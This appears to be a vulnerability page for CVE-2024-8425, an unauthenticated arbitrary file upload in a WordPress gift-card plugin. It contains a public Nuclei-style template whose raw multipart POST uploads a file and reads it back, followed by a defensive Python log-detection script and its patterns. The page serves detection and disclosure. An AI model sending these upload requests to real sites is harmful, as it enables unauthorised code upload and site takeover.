The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
PoC code [public]
id: CVE-2024-8425

info:
  name: WooCommerce Ultimate Gift Card ≤ 2.6.0 - Arbitrary File Upload
  author: jsnv-dev
  severity: critical
  description: |
    The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  reference:
    - https://github.com/KTN1990/CVE-2024-8425
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-ultimate-gift-card/woocommerce-ultimate-gift-card-260-unauthenticated-arbitrary-file-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8425
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8425
    epss-score: 0.63315
    epss-percentile: 0.98354
    cwe-id: CWE-434
    cpe: cpe:2.3:a:wpswings:woocommerce_ultimate_gift_card:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpswings
    product: woocommerce_ultimate_gift_card
    fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card"
  tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev

variables:
  filename: "{{rand_base(7)}}.txt"
  file_content: "{{randstr}}"
  file_message: "{{randstr}}"
  boundary_id: "{{rand_int(100000,999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary_id}}

        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="mwb_wgm_preview_email"

        test
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="tempId"

        1
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="message"

        {{file_message}}
        ------WebKitFormBoundary{{boundary_id}}
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: image/jpeg

        {{file_content}}
        ------WebKitFormBoundary{{boundary_id}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{file_message}}&name={{filename}}")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/mwb_browse/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{file_content}}"

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - file_content
# digest: 4a0a00473045022100c160ae9cc12363800862ff656f19496d500e85d09310ade63d017029d175bd99022040e6ebdde71a40e6826959ecee8862cea538b57d4614d1d54ab3ee0282cdaf25:922c64590222798bb761d5b6d8e72950
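The template above gives a defender two concrete things to look for in web-server logs: a POST to admin-ajax.php with action=mwb_wgm_preview_mail, followed by a request for a file under /wp-content/uploads/mwb_browse/ whose extension is not an image type. The following detection script is an added example, not part of the template or of the plugin; it assumes combined-format access logs, a constructed set of sample log lines, an assumed allowlist of image extensions for that directory, and a five-minute correlation window. It does not cover the second function named in the advisory (mwb_wgm_woocommerce_add_cart_item_data), because the page gives no request shape for it.

```python
import os
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed sample access log (combined log format). These lines are made up for
# this example and do not come from any real site.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /wp-content/uploads/mwb_browse/abcdefg.txt HTTP/1.1" 200 32 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2024:14:02:10 +0000] "GET /wp-content/uploads/mwb_browse/logo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2024:14:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=mwb_wgm_preview_mail HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.50 - - [10/Oct/2024:14:30:00 +0000] "GET /wp-content/uploads/mwb_browse/old.php HTTP/1.1" 404 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_ACTION = "mwb_wgm_preview_mail"          # admin-ajax action named in the advisory
UPLOAD_DIR = "/wp-content/uploads/mwb_browse/"  # directory the template reads the file back from
# Assumed allowlist: what a gift-card preview image upload should legitimately produce.
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
CORRELATION_WINDOW = timedelta(minutes=5)       # assumed window between upload and fetch


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def is_preview_mail_upload(entry):
    """POST to admin-ajax.php with action=mwb_wgm_preview_mail, the vulnerable upload path."""
    if entry["method"] != "POST":
        return False
    url = urlparse(entry["target"])
    return (url.path.endswith("/wp-admin/admin-ajax.php")
            and parse_qs(url.query).get("action") == [UPLOAD_ACTION])


def is_non_image_fetch(entry):
    """GET of a file under mwb_browse whose extension is not on the image allowlist."""
    if entry["method"] != "GET":
        return False
    path = urlparse(entry["target"]).path
    if not path.startswith(UPLOAD_DIR):
        return False
    return os.path.splitext(path)[1].lower() not in IMAGE_EXTENSIONS


def detect(log_text):
    """Return findings for non-image files requested from the plugin upload directory.

    Severity is 'high' when the same client called the upload action within the
    correlation window and the file was served (200), 'medium' when it was served
    with no correlated upload, and 'low' when the server did not serve it.
    """
    uploads_by_ip = {}
    findings = []
    for entry in filter(None, map(parse_line, log_text.splitlines())):
        if is_preview_mail_upload(entry):
            uploads_by_ip.setdefault(entry["ip"], []).append(entry["ts"])
        elif is_non_image_fetch(entry):
            correlated = any(
                timedelta(0) <= entry["ts"] - t <= CORRELATION_WINDOW
                for t in uploads_by_ip.get(entry["ip"], [])
            )
            if entry["status"] == 200:
                severity = "high" if correlated else "medium"
            else:
                severity = "low"
            findings.append({
                "ip": entry["ip"],
                "file": urlparse(entry["target"]).path,
                "status": entry["status"],
                "correlated_upload": correlated,
                "severity": severity,
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

On the sample log this reports the .txt served to 203.0.113.7 right after its upload call as high, the 404 for old.php as low, and nothing for the legitimately fetched logo.jpg. The preview-mail action is a normal plugin feature, so a POST to it on its own is not reported; the signal is a non-image file actually served from the upload directory. A 'medium' finding without a correlated upload is still worth inspecting, since the upload may have happened outside the retained log window.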